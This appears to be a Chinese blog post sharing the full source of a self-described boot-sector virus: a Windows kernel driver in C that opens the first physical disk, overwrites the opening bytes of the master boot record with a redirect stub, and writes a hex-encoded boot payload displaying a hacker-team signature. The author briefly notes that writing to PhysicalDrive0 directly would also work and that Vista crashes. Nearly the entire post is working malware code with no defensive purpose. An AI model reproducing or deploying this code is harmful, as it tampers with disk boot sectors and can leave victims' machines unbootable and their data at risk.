现在的位置: 首页 > 综合 > 正文

[原创]一个引导区病毒的代码

2013年08月09日 ⁄ 综合 ⁄ 共 7097字 ⁄ 字号 评论关闭
  1. #include <ntddk.h>
  3. unsigned char redirect_data[16] = {
  4.     0xB8, 0x01, 0x02, 0xBB, 0x00, 0x7E, 0xB9, 0x02, 0x00, 0xBA, 0x80, 0x00, 0xCD, 0x13, 0xFF, 0xE3
  5. };
  7. unsigned char mbr_data[512] = {
  8.     0xB9, 0x14, 0x00, 0x49, 0xE8, 0x21, 0x00, 0x81, 0xF9, 0x00, 0x00, 0x7D, 0xF6, 0xE8, 0x13, 0x00, 
  9.     0x31, 0xC0, 0x8E, 0xD0, 0xBC, 0x00, 0x7C, 0xFB, 0x50, 0x07, 0x50, 0x1F, 0xFC, 0xBE, 0x1B, 0x7C, 
  10.     0xE9, 0xED, 0xFD, 0x31, 0xC0, 0xCD, 0x16, 0xC3, 0x66, 0x60, 0xB8, 0x50, 0x7E, 0x89, 0xC5, 0xB4, 
  11.     0x13, 0xB0, 0x01, 0xB7, 0x00, 0xB3, 0x01, 0xB9, 0x41, 0x00, 0x8A, 0x36, 0x91, 0x7E, 0x8A, 0x16, 
  12.     0x92, 0x7E, 0xCD, 0x10, 0xA1, 0x91, 0x7E, 0x05, 0x01, 0x00, 0xA3, 0x91, 0x7E, 0x66, 0x61, 0xC3, 
  13.     0x54, 0x68, 0x69, 0x73, 0x20, 0x76, 0x69, 0x72, 0x75, 0x73, 0x20, 0x6D, 0x61, 0x64, 0x65, 0x20, 
  14.     0x62, 0x79, 0x20, 0x58, 0x66, 0x69, 0x6C, 0x6C, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x6D, 0x73, 0x6E, 
  15.     0x48, 0x61, 0x63, 0x6B, 0x65, 0x72, 0x21, 0x20, 0x5B, 0x58, 0x69, 0x61, 0x6F, 0x20, 0x66, 0x65, 
  16.     0x6E, 0x67, 0x20, 0x53, 0x65, 0x63, 0x75, 0x72, 0x69, 0x74, 0x79, 0x20, 0x54, 0x65, 0x61, 0x6D, 
  17.     0x5D, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  18.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  19.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  20.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  21.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  22.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  23.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  24.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  25.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  26.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  27.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  28.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  29.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  30.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  31.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  32.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  33.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  34.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  35.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  36.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  37.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  38.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  39.     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
  40. };
  42. NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING theRegistryPath);
  43. VOID OnUnload(IN PDRIVER_OBJECT DriverObject);
  44. NTSTATUS
  45. FltWriteReadSectors(
  46.     IN PDEVICE_OBJECT DeviceObject,
  47.     OUT PVOID Buffer,
  48.     IN ULONG Length,
  49.     IN LONGLONG ByteOffset,
  50.     IN BOOLEAN Wait,
  51.     IN ULONG IrpType
  52.     );
  54. NTSTATUS
  55. FltReadWriteSectorsCompletion(
  56.     IN PDEVICE_OBJECT DeviceObject,
  57.     IN PIRP Irp,
  58.     IN PVOID Context
  59.     );
  61. #pragma alloc_text(PAGE, FltWriteReadSectors)
  62. #pragma alloc_text(PAGE, FltReadWriteSectorsCompletion)
  64. #pragma alloc_text(INIT, DriverEntry)
  65. #pragma alloc_text(PAGE, OnUnload)
  67. VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
  68. {
  69.     KdPrint(("%s/n","Driver Unload() Called..."));
  70. }
  72. NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING theRegistryPath)
  73. {
  74.     NTSTATUS        ntStatus = STATUS_SUCCESS;
  75.     PDEVICE_OBJECT  DeviceObject = NULL;
  76.     PFILE_OBJECT        FileObj  = NULL;
  77.     UNICODE_STRING  uDevice;
  78.     PVOID pBuffer = NULL;
  80.     KdPrint(("%s/n","Driver DriverEntry Called..."));
  82.     RtlInitUnicodeString(&uDevice,L"//Device//Harddisk0//DR0");
  83.     ntStatus = IoGetDeviceObjectPointer(
  84.         &uDevice,
  85.         FILE_ALL_ACCESS,
  86.         &FileObj,
  87.         &DeviceObject);
  88.     
  89.     DriverObject->DriverUnload = OnUnload;      //Driver Unload
  91.     pBuffer = ExAllocatePool(NonPagedPool, 512);
  93.     KdPrint(("MBR:Read/n"));
  94.     FltWriteReadSectors(DeviceObject, pBuffer, 512, 0, TRUE, IRP_MJ_READ);
  95.     KdPrint(("MBR:Read Complete!/n"));
  97.     RtlCopyMemory(pBuffer, redirect_data, 16);
  99.     KdPrint(("MBR:Write/n"));
  100.     FltWriteReadSectors(DeviceObject, pBuffer, 512, 0, TRUE, IRP_MJ_WRITE);
  101.     KdPrint(("MBR:Write Complete/n"));
  103.     KdPrint(("MBR:Modify/n"));
  104.     FltWriteReadSectors(DeviceObject, mbr_data, 512, 512, TRUE, IRP_MJ_WRITE);
  105.     KdPrint(("MBR:Modify Complete/n"));
  107.     
  108.     return STATUS_SUCCESS;
  109. }
  111. NTSTATUS
  112. FltWriteReadSectors(
  113.     IN PDEVICE_OBJECT DeviceObject,
  114.     OUT PVOID Buffer,
  115.     IN ULONG Length,
  116.     IN LONGLONG ByteOffset,
  117.     IN BOOLEAN Wait,
  118.     IN ULONG IrpType
  119.     )
  120. {
  121.     PIRP                irp;
  122.     IO_STATUS_BLOCK        iosb;
  123.     KEVENT                event;
  124.     NTSTATUS            status;
  126.     irp = IoBuildAsynchronousFsdRequest(IrpType, DeviceObject,
  127.         Buffer, Length, (PLARGE_INTEGER) &ByteOffset, &iosb);
  128.     if (!irp) {
  129.         return STATUS_INSUFFICIENT_RESOURCES;
  130.     }
  132.     if (Wait) {
  133.         KeInitializeEvent(&event, NotificationEvent, FALSE);
  134.         IoSetCompletionRoutine(irp, FltReadWriteSectorsCompletion,
  135.             &event, TRUE, TRUE, TRUE);
  137.         status = IoCallDriver(DeviceObject, irp);
  138.         if (STATUS_PENDING == status) {
  139.             KeWaitForSingleObject(&event, Executive, KernelMode, FALSE, NULL);
  140.             status = iosb.Status;
  141.         }
  142.     } else {
  143.         IoSetCompletionRoutine(irp, FltReadWriteSectorsCompletion,
  144.             NULL, TRUE, TRUE, TRUE);
  145.         irp->UserIosb = NULL;
  146.         status = IoCallDriver(DeviceObject, irp);
  147.     }
  149.     return status;
  150. }
  152. NTSTATUS
  153. FltReadWriteSectorsCompletion(
  154.     IN PDEVICE_OBJECT DeviceObject,
  155.     IN PIRP Irp,
  156.     IN PVOID Context
  157.     )
  158. {
  159.     PMDL     mdl;
  160.     
  161.     UNREFERENCED_PARAMETER(DeviceObject);
  163.     if (Irp->AssociatedIrp.SystemBuffer && (Irp->Flags & IRP_DEALLOCATE_BUFFER)) {
  164.         ExFreePool(Irp->AssociatedIrp.SystemBuffer);
  165.     }
  167.     while (Irp->MdlAddress) {
  168.         mdl = Irp->MdlAddress;
  169.         Irp->MdlAddress = mdl->Next;
  170.         MmUnlockPages(mdl);
  171.         IoFreeMdl(mdl);
  172.     }
  174.     if (Irp->PendingReturned && (Context != NULL)) {
  175.         *Irp->UserIosb = Irp->IoStatus;
  176.         KeSetEvent((PKEVENT) Context, IO_DISK_INCREMENT, FALSE);
  177.     }
  179.     IoFreeIrp(Irp);
  181.     //
  182.     // Don't touch irp any more
  183.     //
  184.     return STATUS_MORE_PROCESSING_REQUIRED;
  185. }

 开始写的时候直接想到驱动了,其实 PhysicalDriver0 直接也可以改,想复杂了,不过效果是一样的。就是VISTA下会蓝,不知道为什么。

返回
【上篇】
【下篇】

作者:

抱歉!评论已关闭.

返回首页

Copyright © 2013-2018 学步园  保留所有权利.
软文销售 QQ客服:2265327166 点击这里给我发消息(其他合作也可洽谈)
必威体育
必威电竞